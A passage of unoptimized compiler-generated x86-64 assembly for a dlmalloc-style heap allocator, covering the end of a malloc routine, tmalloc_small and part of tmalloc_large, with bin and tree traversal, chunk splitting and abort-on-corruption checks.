callq _tmalloc_large
movq %rax, -16(%rbp)
cmpq $0, %rax
je LBB0_48
## %bb.47:
jmp LBB0_59
LBB0_48:
jmp LBB0_49
LBB0_49:
jmp LBB0_50
LBB0_50:
movq -24(%rbp), %rax
cmpq __gm_+8(%rip), %rax
ja LBB0_55
## %bb.51:
movq __gm_+8(%rip), %rax
subq -24(%rbp), %rax
movq %rax, -160(%rbp)
movq __gm_+32(%rip), %rax
movq %rax, -168(%rbp)
cmpq $32, -160(%rbp)
jb LBB0_53
## %bb.52:
movq -168(%rbp), %rax
addq -24(%rbp), %rax
movq %rax, __gm_+32(%rip)
movq %rax, -176(%rbp)
movq -160(%rbp), %rax
movq %rax, __gm_+8(%rip)
movq -160(%rbp), %rcx
orq $1, %rcx
movq -176(%rbp), %rax
movq %rcx, 8(%rax)
movq -160(%rbp), %rdx
movq -176(%rbp), %rax
movq -160(%rbp), %rcx
movq %rdx, (%rax,%rcx)
movq -24(%rbp), %rcx
orq $1, %rcx
orq $2, %rcx
movq -168(%rbp), %rax
movq %rcx, 8(%rax)
jmp LBB0_54
LBB0_53:
movq __gm_+8(%rip), %rax
movq %rax, -184(%rbp)
movq $0, __gm_+8(%rip)
movq $0, __gm_+32(%rip)
movq -184(%rbp), %rcx
orq $1, %rcx
orq $2, %rcx
movq -168(%rbp), %rax
movq %rcx, 8(%rax)
movq -168(%rbp), %rax
movq -184(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
LBB0_54:
movq -168(%rbp), %rax
addq $16, %rax
movq %rax, -16(%rbp)
jmp LBB0_59
LBB0_55:
movq -24(%rbp), %rax
cmpq __gm_+16(%rip), %rax
jae LBB0_57
## %bb.56:
movq -24(%rbp), %rcx
movq __gm_+16(%rip), %rax
subq %rcx, %rax
movq %rax, __gm_+16(%rip)
movq %rax, -192(%rbp)
movq __gm_+40(%rip), %rax
movq %rax, -200(%rbp)
movq -200(%rbp), %rax
addq -24(%rbp), %rax
movq %rax, __gm_+40(%rip)
movq %rax, -208(%rbp)
movq -192(%rbp), %rcx
orq $1, %rcx
movq -208(%rbp), %rax
movq %rcx, 8(%rax)
movq -24(%rbp), %rcx
orq $1, %rcx
orq $2, %rcx
movq -200(%rbp), %rax
movq %rcx, 8(%rax)
movq -200(%rbp), %rax
addq $16, %rax
movq %rax, -16(%rbp)
jmp LBB0_59
LBB0_57:
jmp LBB0_58
LBB0_58:
movq -24(%rbp), %rsi
leaq __gm_(%rip), %rdi
callq _sys_alloc
movq %rax, -16(%rbp)
LBB0_59:
movq -16(%rbp), %rax
addq $240, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function tmalloc_small
_tmalloc_small: ## @tmalloc_small
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $192, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -8(%rbp), %rax
movl 4(%rax), %eax
movq -8(%rbp), %rdx
xorl %ecx, %ecx
subl 4(%rdx), %ecx
andl %ecx, %eax
movl %eax, -48(%rbp)
movl -48(%rbp), %eax
bsfl %eax, %eax
movl %eax, -52(%rbp)
movl -52(%rbp), %eax
movl %eax, -44(%rbp)
movq -8(%rbp), %rax
movl -44(%rbp), %ecx
## kill: def $rcx killed $ecx
movq 600(%rax,%rcx,8), %rax
movq %rax, -24(%rbp)
movq %rax, -32(%rbp)
movq -24(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
subq -16(%rbp), %rax
movq %rax, -40(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
movq -24(%rbp), %rax
cmpq $0, 32(%rax)
je LBB1_3
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movq -24(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -184(%rbp) ## 8-byte Spill
jmp LBB1_4
LBB1_3: ## in Loop: Header=BB1_1 Depth=1
movq -24(%rbp), %rax
movq 40(%rax), %rax
movq %rax, -184(%rbp) ## 8-byte Spill
LBB1_4: ## in Loop: Header=BB1_1 Depth=1
movq -184(%rbp), %rax ## 8-byte Reload
movq %rax, -24(%rbp)
cmpq $0, %rax
je LBB1_8
## %bb.5: ## in Loop: Header=BB1_1 Depth=1
movq -24(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
subq -16(%rbp), %rax
movq %rax, -64(%rbp)
movq -64(%rbp), %rax
cmpq -40(%rbp), %rax
jae LBB1_7
## %bb.6: ## in Loop: Header=BB1_1 Depth=1
movq -64(%rbp), %rax
movq %rax, -40(%rbp)
movq -24(%rbp), %rax
movq %rax, -32(%rbp)
LBB1_7: ## in Loop: Header=BB1_1 Depth=1
jmp LBB1_1
LBB1_8:
movq -32(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB1_71
## %bb.9:
movq -32(%rbp), %rax
addq -16(%rbp), %rax
movq %rax, -72(%rbp)
movq -32(%rbp), %rax
movq -72(%rbp), %rcx
cmpq %rcx, %rax
setb %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB1_70
## %bb.10:
movq -32(%rbp), %rax
movq 48(%rax), %rax
movq %rax, -80(%rbp)
movq -32(%rbp), %rax
movq 24(%rax), %rax
cmpq -32(%rbp), %rax
je LBB1_18
## %bb.11:
movq -32(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -96(%rbp)
movq -32(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -88(%rbp)
movq -96(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -185(%rbp) ## 1-byte Spill
jb LBB1_14
## %bb.12:
movq -96(%rbp), %rax
movq 24(%rax), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq -32(%rbp), %rcx
movb %al, -185(%rbp) ## 1-byte Spill
jne LBB1_14
## %bb.13:
movq -88(%rbp), %rax
movq 16(%rax), %rax
cmpq -32(%rbp), %rax
sete %al
movb %al, -185(%rbp) ## 1-byte Spill
LBB1_14:
movb -185(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB1_16
## %bb.15:
movq -88(%rbp), %rcx
movq -96(%rbp), %rax
movq %rcx, 24(%rax)
movq -96(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB1_17
LBB1_16:
callq _abort
LBB1_17:
jmp LBB1_30
LBB1_18:
movq -32(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
addq $8, %rcx
movq %rcx, -104(%rbp)
movq 40(%rax), %rax
movq %rax, -88(%rbp)
cmpq $0, %rax
jne LBB1_20
## %bb.19:
movq -32(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -104(%rbp)
movq 32(%rax), %rax
movq %rax, -88(%rbp)
cmpq $0, %rax
je LBB1_29
LBB1_20:
jmp LBB1_21
LBB1_21: ## =>This Inner Loop Header: Depth=1
movq -88(%rbp), %rcx
movq %rcx, %rax
addq $32, %rax
addq $8, %rax
movq %rax, -112(%rbp)
movb $1, %al
cmpq $0, 40(%rcx)
movb %al, -186(%rbp) ## 1-byte Spill
jne LBB1_23
## %bb.22: ## in Loop: Header=BB1_21 Depth=1
movq -88(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -112(%rbp)
cmpq $0, 32(%rax)
setne %al
movb %al, -186(%rbp) ## 1-byte Spill
LBB1_23: ## in Loop: Header=BB1_21 Depth=1
movb -186(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB1_24
jmp LBB1_25
LBB1_24: ## in Loop: Header=BB1_21 Depth=1
movq -112(%rbp), %rax
movq %rax, -104(%rbp)
movq (%rax), %rax
movq %rax, -88(%rbp)
jmp LBB1_21
LBB1_25:
movq -104(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB1_27
## %bb.26:
movq -104(%rbp), %rax
movq $0, (%rax)
jmp LBB1_28
LBB1_27:
callq _abort
LBB1_28:
jmp LBB1_29
LBB1_29:
jmp LBB1_30
LBB1_30:
cmpq $0, -80(%rbp)
je LBB1_58
## %bb.31:
movq -8(%rbp), %rax
addq $600, %rax ## imm = 0x258
movq -32(%rbp), %rcx
movl 56(%rcx), %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -120(%rbp)
movq -32(%rbp), %rax
movq -120(%rbp), %rcx
cmpq (%rcx), %rax
jne LBB1_35
## %bb.32:
movq -88(%rbp), %rax
movq -120(%rbp), %rcx
movq %rax, (%rcx)
cmpq $0, %rax
jne LBB1_34
## %bb.33:
movq -32(%rbp), %rax
movl 56(%rax), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
xorl $-1, %ecx
movq -8(%rbp), %rax
andl 4(%rax), %ecx
movl %ecx, 4(%rax)
LBB1_34:
jmp LBB1_42
LBB1_35:
movq -80(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB1_40
## %bb.36:
movq -80(%rbp), %rax
movq 32(%rax), %rax
cmpq -32(%rbp), %rax
jne LBB1_38
## %bb.37:
movq -88(%rbp), %rcx
movq -80(%rbp), %rax
movq %rcx, 32(%rax)
jmp LBB1_39
LBB1_38:
movq -88(%rbp), %rcx
movq -80(%rbp), %rax
movq %rcx, 40(%rax)
LBB1_39:
jmp LBB1_41
LBB1_40:
callq _abort
LBB1_41:
jmp LBB1_42
LBB1_42:
cmpq $0, -88(%rbp)
je LBB1_57
## %bb.43:
movq -88(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB1_55
## %bb.44:
movq -80(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 48(%rax)
movq -32(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -128(%rbp)
cmpq $0, %rax
je LBB1_49
## %bb.45:
movq -128(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB1_47
## %bb.46:
movq -128(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 32(%rax)
movq -88(%rbp), %rcx
movq -128(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB1_48
LBB1_47:
callq _abort
LBB1_48:
jmp LBB1_49
LBB1_49:
movq -32(%rbp), %rax
movq 40(%rax), %rax
movq %rax, -136(%rbp)
cmpq $0, %rax
je LBB1_54
## %bb.50:
movq -136(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB1_52
## %bb.51:
movq -136(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 40(%rax)
movq -88(%rbp), %rcx
movq -136(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB1_53
LBB1_52:
callq _abort
LBB1_53:
jmp LBB1_54
LBB1_54:
jmp LBB1_56
LBB1_55:
callq _abort
LBB1_56:
jmp LBB1_57
LBB1_57:
jmp LBB1_58
LBB1_58:
cmpq $32, -40(%rbp)
jae LBB1_60
## %bb.59:
movq -40(%rbp), %rcx
addq -16(%rbp), %rcx
orq $1, %rcx
orq $2, %rcx
movq -32(%rbp), %rax
movq %rcx, 8(%rax)
movq -32(%rbp), %rax
movq -40(%rbp), %rcx
addq -16(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
jmp LBB1_69
LBB1_60:
movq -16(%rbp), %rcx
orq $1, %rcx
orq $2, %rcx
movq -32(%rbp), %rax
movq %rcx, 8(%rax)
movq -40(%rbp), %rcx
orq $1, %rcx
movq -72(%rbp), %rax
movq %rcx, 8(%rax)
movq -40(%rbp), %rdx
movq -72(%rbp), %rax
movq -40(%rbp), %rcx
movq %rdx, (%rax,%rcx)
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -144(%rbp)
cmpq $0, -144(%rbp)
je LBB1_68
## %bb.61:
movq -8(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -152(%rbp)
movq -144(%rbp), %rax
shrq $3, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -156(%rbp)
movq -8(%rbp), %rax
addq $72, %rax
movl -156(%rbp), %ecx
shll $1, %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -168(%rbp)
movq -168(%rbp), %rax
movq %rax, -176(%rbp)
movq -8(%rbp), %rax
movl (%rax), %eax
movl -156(%rbp), %ecx
movl $1, %edx
## kill: def $cl killed $ecx
shll %cl, %edx
movl %edx, %ecx
andl %ecx, %eax
cmpl $0, %eax
jne LBB1_63
## %bb.62:
movl -156(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
movq -8(%rbp), %rax
orl (%rax), %ecx
movl %ecx, (%rax)
jmp LBB1_67
LBB1_63:
movq -168(%rbp), %rax
movq 16(%rax), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB1_65
## %bb.64:
movq -168(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -176(%rbp)
jmp LBB1_66
LBB1_65:
callq _abort
LBB1_66:
jmp LBB1_67
LBB1_67:
movq -152(%rbp), %rcx
movq -168(%rbp), %rax
movq %rcx, 16(%rax)
movq -152(%rbp), %rcx
movq -176(%rbp), %rax
movq %rcx, 24(%rax)
movq -176(%rbp), %rcx
movq -152(%rbp), %rax
movq %rcx, 16(%rax)
movq -168(%rbp), %rcx
movq -152(%rbp), %rax
movq %rcx, 24(%rax)
LBB1_68:
movq -40(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 8(%rax)
movq -72(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 32(%rax)
LBB1_69:
movq -32(%rbp), %rax
addq $16, %rax
addq $192, %rsp
popq %rbp
retq
LBB1_70:
jmp LBB1_71
LBB1_71:
callq _abort
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function tmalloc_large
_tmalloc_large: ## @tmalloc_large
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $336, %rsp ## imm = 0x150
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
movq $0, -32(%rbp)
xorl %eax, %eax
## kill: def $rax killed $eax
subq -24(%rbp), %rax
movq %rax, -40(%rbp)
movq -24(%rbp), %rax
shrq $8, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -56(%rbp)
cmpl $0, -56(%rbp)
jne LBB2_2
## %bb.1:
movl $0, -52(%rbp)
jmp LBB2_6
LBB2_2:
cmpl $65535, -56(%rbp) ## imm = 0xFFFF
jbe LBB2_4
## %bb.3:
movl $31, -52(%rbp)
jmp LBB2_5
LBB2_4:
movl -56(%rbp), %eax
bsrl %eax, %ecx
xorl $31, %ecx
movl $31, %eax
subl %ecx, %eax
movl %eax, -60(%rbp)
movl -60(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
movq -24(%rbp), %rdx
movl -60(%rbp), %ecx
addl $7, %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
## kill: def $cl killed $rcx
shrq %cl, %rdx
movq %rdx, %rcx
andq $1, %rcx
addq %rcx, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -52(%rbp)
LBB2_5:
jmp LBB2_6
LBB2_6:
movq -16(%rbp), %rax
movl -52(%rbp), %ecx
## kill: def $rcx killed $ecx
movq 600(%rax,%rcx,8), %rax
movq %rax, -48(%rbp)
cmpq $0, %rax
je LBB2_22
## %bb.7:
movq -24(%rbp), %rax
movq %rax, -288(%rbp) ## 8-byte Spill
cmpl $31, -52(%rbp)
jne LBB2_9
## %bb.8:
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -296(%rbp) ## 8-byte Spill
jmp LBB2_10
LBB2_9:
movl -52(%rbp), %eax
shrl $1, %eax
addl $8, %eax
subl $2, %eax
movl %eax, %eax
movl %eax, %ecx
movl $63, %eax
subq %rcx, %rax
movq %rax, -296(%rbp) ## 8-byte Spill
LBB2_10:
movq -288(%rbp), %rax ## 8-byte Reload
movq -296(%rbp), %rcx ## 8-byte Reload
## kill: def $cl killed $rcx
shlq %cl, %rax
movq %rax, -72(%rbp)
movq $0, -80(%rbp)
LBB2_11: ## =>This Inner Loop Header: Depth=1
movq -48(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
subq -24(%rbp), %rax
movq %rax, -96(%rbp)
movq -96(%rbp), %rax
cmpq -40(%rbp), %rax
jae LBB2_15
## %bb.12: ## in Loop: Header=BB2_11 Depth=1
movq -48(%rbp), %rax
movq %rax, -32(%rbp)
movq -96(%rbp), %rax
movq %rax, -40(%rbp)
cmpq $0, %rax
jne LBB2_14
## %bb.13:
jmp LBB2_21
LBB2_14: ## in Loop: Header=BB2_11 Depth=1
jmp LBB2_15
LBB2_15: ## in Loop: Header=BB2_11 Depth=1
movq -48(%rbp), %rax
movq 40(%rax), %rax
movq %rax, -88(%rbp)
movq -48(%rbp), %rax
movq -72(%rbp), %rcx
shrq $63, %rcx
andq $1, %rcx
movq 32(%rax,%rcx,8), %rax
movq %rax, -48(%rbp)
cmpq $0, -88(%rbp)
je LBB2_18
## %bb.16: ## in Loop: Header=BB2_11 Depth=1
movq -88(%rbp), %rax
cmpq -48(%rbp), %rax
je LBB2_18
## %bb.17: ## in Loop: Header=BB2_11 Depth=1
movq -88(%rbp), %rax
movq %rax, -80(%rbp)
LBB2_18: ## in Loop: Header=BB2_11 Depth=1
cmpq $0, -48(%rbp)
jne LBB2_20
## %bb.19:
movq -80(%rbp), %rax
movq %rax, -48(%rbp)
jmp LBB2_21
LBB2_20: ## in Loop: Header=BB2_11 Depth=1
movq -72(%rbp), %rax
shlq $1, %rax
movq %rax, -72(%rbp)
jmp LBB2_11
LBB2_21:
jmp LBB2_22
LBB2_22:
cmpq $0, -48(%rbp)
jne LBB2_27
## %bb.23:
cmpq $0, -32(%rbp)
jne LBB2_27
## %bb.24:
movl -52(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
shll $1, %eax
movl -52(%rbp), %ecx
movl $1, %edx
## kill: def $cl killed $ecx
shll %cl, %edx
shll $1, %edx
xorl %ecx, %ecx
subl %edx, %ecx
orl %ecx, %eax
movq -16(%rbp), %rcx
andl 4(%rcx), %eax
movl %eax, -100(%rbp)
cmpl $0, -100(%rbp)
je LBB2_26
## %bb.25:
movl -100(%rbp), %eax
xorl %ecx, %ecx
subl -100(%rbp), %ecx
andl %ecx, %eax
movl %eax, -108(%rbp)
movl -108(%rbp), %eax
bsfl %eax, %eax
movl %eax, -112(%rbp)
movl -112(%rbp), %eax
movl %eax, -104(%rbp)
movq -16(%rbp), %rax
movl -104(%rbp), %ecx
## kill: def $rcx killed $ecx
movq 600(%rax,%rcx,8), %rax
movq %rax, -48(%rbp)
LBB2_26:
jmp LBB2_27
LBB2_27:
jmp LBB2_28
LBB2_28: ## =>This Inner Loop Header: Depth=1
cmpq $0, -48(%rbp)
je LBB2_35
## %bb.29: ## in Loop: Header=BB2_28 Depth=1
movq -48(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
subq -24(%rbp), %rax
movq %rax, -120(%rbp)
movq -120(%rbp), %rax
cmpq -40(%rbp), %rax
jae LBB2_31
## %bb.30: ## in Loop: Header=BB2_28 Depth=1
movq -120(%rbp), %rax
movq %rax, -40(%rbp)
movq -48(%rbp), %rax
movq %rax, -32(%rbp)
LBB2_31: ## in Loop: Header=BB2_28 Depth=1
movq -48(%rbp), %rax
cmpq $0, 32(%rax)
je LBB2_33
## %bb.32: ## in Loop: Header=BB2_28 Depth=1
movq -48(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -304(%rbp) ## 8-byte Spill
jmp LBB2_34
LBB2_33: ## in Loop: Header=BB2_28 Depth=1
movq -48(%rbp), %rax
movq 40(%rax), %rax
movq %rax, -304(%rbp) ## 8-byte Spill
LBB2_34: ## in Loop: Header=BB2_28 Depth=1
movq -304(%rbp), %rax ## 8-byte Reload
movq %rax, -48(%rbp)
jmp LBB2_28
LBB2_35:
cmpq $0, -32(%rbp)
je LBB2_128
## %bb.36:
movq -40(%rbp), %rax
movq -16(%rbp), %rcx
movq 8(%rcx), %rcx
subq -24(%rbp), %rcx
cmpq %rcx, %rax
jae LBB2_128
## %bb.37:
movq -32(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB2_127
## %bb.38:
movq -32(%rbp), %rax
addq -24(%rbp), %rax
movq %rax, -128(%rbp)
movq -32(%rbp), %rax
movq -128(%rbp), %rcx
cmpq %rcx, %rax
setb %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB2_126
## %bb.39:
movq -32(%rbp), %rax
movq 48(%rax), %rax
movq %rax, -136(%rbp)
movq -32(%rbp), %rax
movq 24(%rax), %rax
cmpq -32(%rbp), %rax
je LBB2_47
## %bb.40:
movq -32(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -152(%rbp)
movq -32(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -144(%rbp)
movq -152(%rbp), %rcx
movq -16(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -305(%rbp) ## 1-byte Spill
jb LBB2_43
## %bb.41:
movq -152(%rbp), %rax
movq 24(%rax), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq -32(%rbp), %rcx
movb %al, -305(%rbp) ## 1-byte Spill
jne LBB2_43
## %bb.42:
movq -144(%rbp), %rax
movq 16(%rax), %rax
cmpq -32(%rbp), %rax
sete %al
movb %al, -305(%rbp) ## 1-byte Spill
LBB2_43:
movb -305(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB2_45
## %bb.44:
movq -144(%rbp), %rcx
movq -152(%rbp), %rax
movq %rcx, 24(%rax)
movq -152(%rbp), %rcx
movq -144(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB2_46
LBB2_45:
callq _abort
LBB2_46:
jmp LBB2_59
LBB2_47:
movq -32(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
addq $8, %rcx
movq %rcx, -160(%rbp)
movq 40(%rax), %rax
movq %rax, -144(%rbp)
cmpq $0, %rax
jne LBB2_49
## %bb.48:
movq -32(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -160(%rbp)
movq 32(%rax), %rax
movq %rax, -144(%rbp)
cmpq $0, %rax
je LBB2_58
LBB2_49:
jmp LBB2_50
LBB2_50: ## =>This Inner Loop Header: Depth=1
movq -144(%rbp), %rcx
movq %rcx, %rax
addq $32, %rax
addq $8, %rax
movq %rax, -168(%rbp)
movb $1, %al
cmpq $0, 40(%rcx)
movb %al, -306(%rbp) ## 1-byte Spill
jne LBB2_52
## %bb.51: ## in Loop: Header=BB2_50 Depth=1
movq -144(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -168(%rbp)
cmpq $0, 32(%rax)
setne %al
movb %al, -306(%rbp) ## 1-byte Spill
LBB2_52: ## in Loop: Header=BB2_50 Depth=1
movb -306(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB2_53
jmp LBB2_54
LBB2_53: ## in Loop: Header=BB2_50 Depth=1
movq -168(%rbp), %rax
movq %rax, -160(%rbp)
movq (%rax), %rax
movq %rax, -144(%rbp)
jmp LBB2_50
LBB2_54:
movq -160(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB2_56
## %bb.55:
movq -160(%rbp), %rax
movq $0, (%rax)
jmp LBB2_57
LBB2_56:
callq _abort
LBB2_57:
jmp LBB2_58
LBB2_58:
jmp LBB2_59
LBB2_59:
cmpq $0, -136(%rbp)
je LBB2_87
## %bb.60:
movq -16(%rbp), %rax
addq $600, %rax ## imm = 0x258
movq -32(%rbp), %rcx
movl 56(%rcx), %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -176(%rbp)
movq -32(%rbp), %rax
movq -176(%rbp), %rcx
cmpq (%rcx), %rax
jne LBB2_64
## %bb.61:
movq -144(%rbp), %rax
movq -176(%rbp), %rcx
movq %rax, (%rcx)
cmpq $0, %rax
jne LBB2_63
## %bb.62:
movq -32(%rbp), %rax
movl 56(%rax), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
xorl $-1, %ecx
movq -16(%rbp), %rax
andl 4(%rax), %ecx
movl %ecx, 4(%rax)
LBB2_63:
jmp LBB2_71
LBB2_64:
movq -136(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB2_69
## %bb.65:
movq -136(%rbp), %rax
movq 32(%rax), %rax
cmpq -32(%rbp), %rax
jne LBB2_67
## %bb.66:
movq -144(%rbp), %rcx
movq -136(%rbp), %rax
movq %rcx, 32(%rax)
jmp LBB2_68
LBB2_67:
movq -144(%rbp), %rcx
movq -136(%rbp), %rax
movq %rcx, 40(%rax)
LBB2_68:
jmp LBB2_70
LBB2_69:
callq _abort
LBB2_70:
jmp LBB2_71
LBB2_71:
cmpq $0, -144(%rbp)
je LBB2_86
## %bb.72:
movq -144(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB2_84
## %bb.73:
movq -136(%rbp), %rcx
movq -144(%rbp), %rax
movq %rcx, 48(%rax)
movq -32(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -184(%rbp)
cmpq $0, %rax
je LBB2_78
## %bb.74:
movq -184(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB2_76
## %bb.75:
movq -184(%rbp), %rcx
movq -144(%rbp), %rax
movq %rcx, 32(%rax)
movq -144(%rbp), %rcx
movq -184(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB2_77
LBB2_76:
callq _abort
LBB2_77:
jmp LBB2_78
LBB2_78:
movq -32(%rbp), %rax
movq 40(%rax), %rax
movq %rax, -192(%rbp)
cmpq $0, %rax
je LBB2_83
## %bb.79:
movq -192(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB2_81
## %bb.80:
movq -192(%rbp), %rcx
movq -144(%rbp), %rax
movq %rcx, 40(%rax)
movq -144(%rbp), %rcx
movq -192(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB2_82
LBB2_81:
callq _abort
LBB2_82:
jmp LBB2_83
LBB2_83:
jmp LBB2_85
LBB2_84:
callq _abort
LBB2_85:
jmp LBB2_86
LBB2_86:
jmp LBB2_87
LBB2_87:
cmpq $32, -40(%rbp)
jae LBB2_89
## %bb.88:
movq -40(%rbp), %rcx
addq -24(%rbp), %rcx
orq $1, %rcx
orq $2, %rcx
movq -32(%rbp), %rax
movq %rcx, 8(%rax)
movq -32(%rbp), %rax
movq -40(%rbp), %rcx
addq -24(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
jmp LBB2_125
LBB2_89:
movq -24(%rbp), %rcx
orq $1, %rcx
orq $2, %rcx
movq -32(%rbp), %rax
movq %rcx, 8(%rax)
movq -40(%rbp), %rcx
orq $1, %rcx
movq -128(%rbp), %rax
movq %rcx, 8(%rax)
movq -40(%rbp), %rdx
movq -128(%rbp), %rax
movq -40(%rbp), %rcx
movq %rdx, (%rax,%rcx)
movq -40(%rbp), %rax
shrq $3, %rax
cmpq $32, %rax
jae LBB2_97
## %bb.90:
movq -40(%rbp), %rax
shrq $3, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -196(%rbp)
movq -16(%rbp), %rax
addq $72, %rax
movl -196(%rbp), %ecx
shll $1, %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -208(%rbp)
movq -208(%rbp), %rax
movq %rax, -216(%rbp)
movq -16(%rbp), %rax
movl (%rax), %eax
movl -196(%rbp), %ecx
movl $1, %edx
## kill: def $cl killed $ecx
shll %cl, %edx
movl %edx, %ecx
andl %ecx, %eax
cmpl $0, %eax
jne LBB2_92
## %bb.91:
movl -196(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
